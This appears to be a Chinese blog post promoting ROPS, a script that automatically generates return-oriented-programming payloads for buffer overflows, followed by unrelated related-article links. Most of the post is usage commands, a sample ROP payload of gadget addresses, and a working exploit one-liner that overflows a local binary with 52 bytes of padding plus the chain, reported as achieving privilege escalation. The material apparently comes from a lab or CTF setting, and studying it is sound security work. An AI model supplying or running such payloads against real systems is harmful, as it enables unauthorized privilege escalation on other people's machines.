ROPS 自动化快速构造缓冲区溢出ROP链工具

项目地址:https://github.com/MartinxMax/ROPS

ROPS

快速自动化构造ROP(Return-Oriented Programming)链的脚本,用于生成ROP攻击的有效载荷。

Usage

$ ./rops.sh

$ ./rops.sh /home/ayush/.binary/rop

该脚本将根据提供的二进制文件自动生成有效的ROP链有效载荷。一旦确认了缓冲区溢出的大小,您就可以使用脚本生成的有效载荷。

脚本生成的有效载荷会自动转换为小端字节序,因此可以直接通过复制来使用。

示例有效载荷:

payload => BUFFER + 0xA03DE5B7 + 0xD079E4B7 + 0x0B4AF7B7

在GDB示例中,我们确认了缓冲区大小为52,根据载荷结果,再次构造最终的载荷

/home/ayush/.binary/rop $(python2 -c 'print "A"*52 + "\xA0\x3D\xE5\xB7" + "\xD0\x79\xE4\xB7"+"\x0B\x4A\xF7\xB7"')

成功权限提升

相关推荐
罗技12315 分钟前
Docker 启动 Easysearch 时自定义初始密码的几种方式
运维·docker·容器
维尔切1 小时前
Nginx 反向代理与负载均衡
运维·nginx·负载均衡
知白守黑2672 小时前
反向代理和负载均衡
运维·负载均衡
杨云龙UP2 小时前
小工具大体验:rlwrap加持下的Oracle/MySQL/SQL Server命令行交互
运维·服务器·数据库·sql·mysql·oracle·sqlserver
GAOJ_K3 小时前
从汽车传动到航空航天:滚珠花键的跨领域精密革命
人工智能·科技·机器人·自动化·制造
iconball3 小时前
个人用云计算学习笔记 --18(NFS 服务器、iSCSI 服务器)
linux·运维·笔记·学习·云计算
广药门徒3 小时前
Linux驱动开发与BuildRoot是什么关系与其的应用场景
linux·运维·驱动开发
Bruce_Liuxiaowei6 小时前
MQTT协议在物联网环境中的安全风险与防范指南
运维·网络·物联网·安全·网络安全
-dzk-12 小时前
【3DGS复现】Autodl服务器复现3DGS《简单快速》《一次成功》《新手练习复现必备》
运维·服务器·python·计算机视觉·3d·三维重建·三维
CS Beginner12 小时前
【Linux】 Ubuntu 开发环境极速搭建
linux·运维·ubuntu